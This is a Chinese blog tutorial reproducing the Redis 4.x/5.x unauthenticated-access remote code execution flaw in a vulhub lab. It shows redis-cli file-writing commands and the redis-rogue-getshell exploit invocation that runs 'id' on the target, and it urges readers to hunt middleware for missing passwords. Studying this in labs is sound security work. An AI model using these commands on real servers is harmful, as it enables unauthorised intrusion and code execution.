Redis未授权访问漏洞实战

最新推荐文章于 2024-02-26 19:40:54 发布
最新推荐文章于 2024-02-26 19:40:54 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: web渗透实战 文章标签: 未授权访问漏洞 Redis RCE web渗透 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46367450/article/details/132629394
版权

文章目录

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

概述

​ 本文章主要是针对于vulhub靶场中的Redis 4.x/5.x 主从复制导致的命令执行进行复现,部分复现步骤可以参考vulhub靶场,这里我提供了利用POC工具验证的步骤,相比vulhub更加详细简单。

漏洞原理

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

本篇文章需要用到的工具下载地址

POC验证工具:unauthorized_com-main

EXP利用工具:redis-rogue-getshell-master

Redis概述

在复现未授权访问漏洞之前,我们有必要先大致的了解一下Redis是什么,Redis的简单使用与Redis未授权访问漏洞的危害。

Redis 介绍

Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。

Redis 数据库经常用于Web 应用的缓存。

Redis 可以与文件系统进行交互。

Redis 监听TCP/6379

Redis 简单使用

Redis 未设置密码,客户端工具可以直接链接。

┌──(root㉿kali)-[~/…/vulhub/vulhub/redis/4-unacc]
└─# redis-cli -h 10.9.75.101
10.9.75.101:6379> set name yuanboss
OK
10.9.75.101:6379> get name
"yuanboss"
10.9.75.101:6379> config set dir /tmp/
OK
10.9.75.101:6379> config set dbfilename yuanboss.txt 
OK
10.9.75.101:6379> save
OK

Redis未授权漏洞危害

image-20230901184319687

漏洞复现

启动靶场环境

前往vulhub的redis/4-unacc目录执行以下命令启动靶场环境

docker-compose up -d

POC漏洞验证

通过我提供的POC验证工具对靶场的IP进行检测,查看是否具有未授权访问漏洞

image-20230901175612226

经过POC验证,存在redis未授权访问漏洞

EXP漏洞利用

通过我提供的EXP利用工具进行利用,由于这个靶场环境中的redis的版本范围是符合是是主从复制的,具有远程代码执行漏洞:

注意-r参数指的是目标的IP地址,-L是本机的IP地址,不要用本机的会换地址或者localhost

python3 redis-master.py -r 10.9.75.101 -p 6379 -L 10.9.75.101 -P 8888 -f RedisModulesSDK/exp.so -c "id"

image-20230901181259340

可以看到我们利用RCE漏洞成功执行了linux中的 id命令

总结

​ 对于未授权访问漏洞,我们要具有敏锐的嗅觉,未授权访问一般都出现于中间件,比如 zookeeper,docker,redis,wordpress等中间件或者框架,看到这类的中间件或者框架,我们就应该想到是否不需要密码就能访问,这个时候我们就可以直接拿到我们的POC工具进行漏洞验证了,如果发现存在某个漏洞,我们就可以去网上找EXP或者自己编写EXP进行利用。

​ 所以未授权访问漏洞的本质其实就是中间件或者CMS框架没有这种密码,导致我们可以直接连接。

yuan_boss
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Redis授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
MateSnake的博客
05-17 1266
Redis授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
4-unacc(redis授权访问)vulhub复现
qq_52279315的博客
05-18 327
vulhub靶场复现【redis
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 2879
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
redis授权getshell四种方式
BING
04-24 4206
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
Redis 授权访问漏洞与getshell(附getshell检测工具)
告白的博客
02-24 3978
Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的授权范围与Pickle反序列化
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4543
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
redis-poc:概念文件redis aspnetcore
02-14
redis-poc Prueba de concepto redis aspnetcore
Redis授权访问漏洞验证脚本编写(POC)
Mrs_H的博客
04-11 1402
Redis授权访问漏洞验证脚本编写(POC) 1.实验环境: Ubuntu18(靶机) kali linux(攻击机) 2.代码的编写: import sys import getopt import socket def url_exec(url):#将要探测的主机地址都存入一个待测数组内 ans = [] group = [] li = url.split(".") if (url.find('-') == -1): group.append(url
Redis授权访问漏洞复现与工具安装
Welcome To Myon'Blog !
01-11 2142
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。Redis授权访问影响版本为5.0.5以下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
一次Redis授权访问漏洞入侵分析
java060515的专栏
11-26 1750
0x00 简介 通过之前部署的蜜罐系统,我近日在滴滴云上捕获到了一个通过 Redis 授权访问漏洞进行入侵的蠕虫样本,该样本的特点是使用 Python 脚本进行横向漏洞扫描,并且具有进程隐藏和卸载某些云上安全产品的功能。 0x01 样本分析 通过蜜罐日志得到攻击者入侵开始于通过 Redis 写 crontab: 命令中的 URL https://pastebin.com/raw/1NtRkBc...
redis-rceRedis 4.x/5.x 授权访问-远程命令执行漏洞
Delphinidae
12-15 577
漏洞参考: https://vulhub.org/#/environments/redis/4-unacc/ https://github.com/vulhub/redis-rogue-getshell 漏洞原理: Redis授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 下载exp代码,本地编译后生成exp.so 的库文件,然后通过redis授权可以配置主从同步功能修改主服务器的地址为存放exp.so的地址,利用同步功能
Redis授权访问高危漏洞预警
systemino的博客
07-12 1454
近日,深信服安全团队发现开源数据库Redis爆出了一个授权访问漏洞,第一时间进行跟踪以及分析预警。经研究发现,利用该漏洞,攻击者可以实现反弹shell进行任意代码执行。 Redis软件介绍 Redis是一款开源的(拥有BSD证书)、使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,提供多种语言的API。 Redis支持多种数据结构,如字符串,散列,...
.bat脚本自动yes_Redis授权访问漏洞(自写自动化利用EXP分享)
weixin_35835018的博客
12-28 242
# 前言:之前已经有文章写过redis授权访问的利用总结了,这次主要是py脚本自动化的一个小分享吧。也算是对自己学习的一个记录..一、环境搭建(建议用centos7搭建):wget http://download.redis.io/releases/redis-5.0.0.tar.gztar -xvzf redis-5.0.0.tar.gzcd redis-5.0.0make漏洞描述:...
Redis 4.x5.x 授权访问漏洞EXP复现过程
桜的博客
03-29 846
本次使用Vulhub一键搭建漏洞测试靶场 地址:https://vulhub.org/#/environments/redis/4-unacc/ 搭建过程就不讲了 可以看到已经启动docker了 Nmap探测一下靶机端口 如上图所示,redis服务正常开启了,在6379端口 kali直接用redis连接,发现可直接访问,还能通过info命令查看到服务器等一些敏感信息 然后将exp gi...
Redis 授权访问缺陷
热门推荐
我心如水
06-19 1万+
昨天接到一个开发朋友的求助说是有一个异常的进程占用了将近百分之800(8核)cpu使用率,于是登录服务器查看,确实有一个异常进程,通过ps查到了该进程调用的脚本,继而继续追踪后门定时任务,确实都存在,通过后门定时任务找到了攻击的最终源头,起因便是redis授权漏洞造成,下面公布一下该攻击脚本: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止公网访问:将Redis服务器部署在内网中,并禁止对公网开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis的安全补丁,以修复已知漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值